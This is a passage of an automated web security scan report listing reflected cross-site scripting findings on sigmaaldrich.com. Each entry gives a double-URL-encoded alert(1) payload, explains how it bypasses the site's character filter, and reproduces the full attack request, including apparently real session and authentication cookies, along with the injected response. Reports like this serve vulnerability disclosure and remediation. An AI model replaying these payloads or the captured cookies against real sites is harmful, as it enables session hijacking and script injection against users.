       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/sigma-aldrich6dbc9";alert(1)//713ae4d73e/images/white-bar.Par.0001.Image","E404") ;
   </script>
...[SNIP]...

1.471. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/images/white-bar.Par.0001.Image [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/images/white-bar.Par.0001.Image

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3f6dd%2522%253balert%25281%2529%252f%252ff0e29a72b3a was submitted in the REST URL parameter 4. This input was echoed as 3f6dd";alert(1)//f0e29a72b3a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/sigma-aldrich/images3f6dd%2522%253balert%25281%2529%252f%252ff0e29a72b3a/white-bar.Par.0001.Image HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:43 GMT
Content-Length: 28962
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/sigma-aldrich/images3f6dd";alert(1)//f0e29a72b3a/white-bar.Par.0001.Image","E404") ;
   </script>
...[SNIP]...

1.472. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/images/white-bar.Par.0001.Image [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/images/white-bar.Par.0001.Image

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e932d%2522%253balert%25281%2529%252f%252fa3a604110ab was submitted in the REST URL parameter 5. This input was echoed as e932d";alert(1)//a3a604110ab in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/sigma-aldrich/images/white-bar.Par.0001.Imagee932d%2522%253balert%25281%2529%252f%252fa3a604110ab HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:45 GMT
Content-Length: 28962
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/sigma-aldrich/images/white-bar.Par.0001.Imagee932d";alert(1)//a3a604110ab","E404") ;
   </script>
...[SNIP]...

1.473. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/social/fb-25x25 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/social/fb-25x25

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 208c2%2522%253balert%25281%2529%252f%252fb65ded2996b was submitted in the REST URL parameter 1. This input was echoed as 208c2";alert(1)//b65ded2996b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc208c2%2522%253balert%25281%2529%252f%252fb65ded2996b/medialib/sigma-aldrich/social/fb-25x25 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:37 GMT
Content-Length: 28946
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc208c2";alert(1)//b65ded2996b/medialib/sigma-aldrich/social/fb-25x25","E404") ;
   </script>
...[SNIP]...

1.474. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/social/fb-25x25 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/social/fb-25x25

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 86b1d%2522%253balert%25281%2529%252f%252fc51a2aeb27e was submitted in the REST URL parameter 2. This input was echoed as 86b1d";alert(1)//c51a2aeb27e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib86b1d%2522%253balert%25281%2529%252f%252fc51a2aeb27e/sigma-aldrich/social/fb-25x25 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:39 GMT
Content-Length: 28946
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib86b1d";alert(1)//c51a2aeb27e/sigma-aldrich/social/fb-25x25","E404") ;
   </script>
...[SNIP]...

1.475. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/social/fb-25x25 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/social/fb-25x25

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ceee4%2522%253balert%25281%2529%252f%252f5e7262edb02 was submitted in the REST URL parameter 3. This input was echoed as ceee4";alert(1)//5e7262edb02 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/sigma-aldrichceee4%2522%253balert%25281%2529%252f%252f5e7262edb02/social/fb-25x25 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:41 GMT
Content-Length: 28946
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/sigma-aldrichceee4";alert(1)//5e7262edb02/social/fb-25x25","E404") ;
   </script>
...[SNIP]...

1.476. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/social/fb-25x25 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/social/fb-25x25

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1f4ab%2522%253balert%25281%2529%252f%252f6f48b0a67c6 was submitted in the REST URL parameter 4. This input was echoed as 1f4ab";alert(1)//6f48b0a67c6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

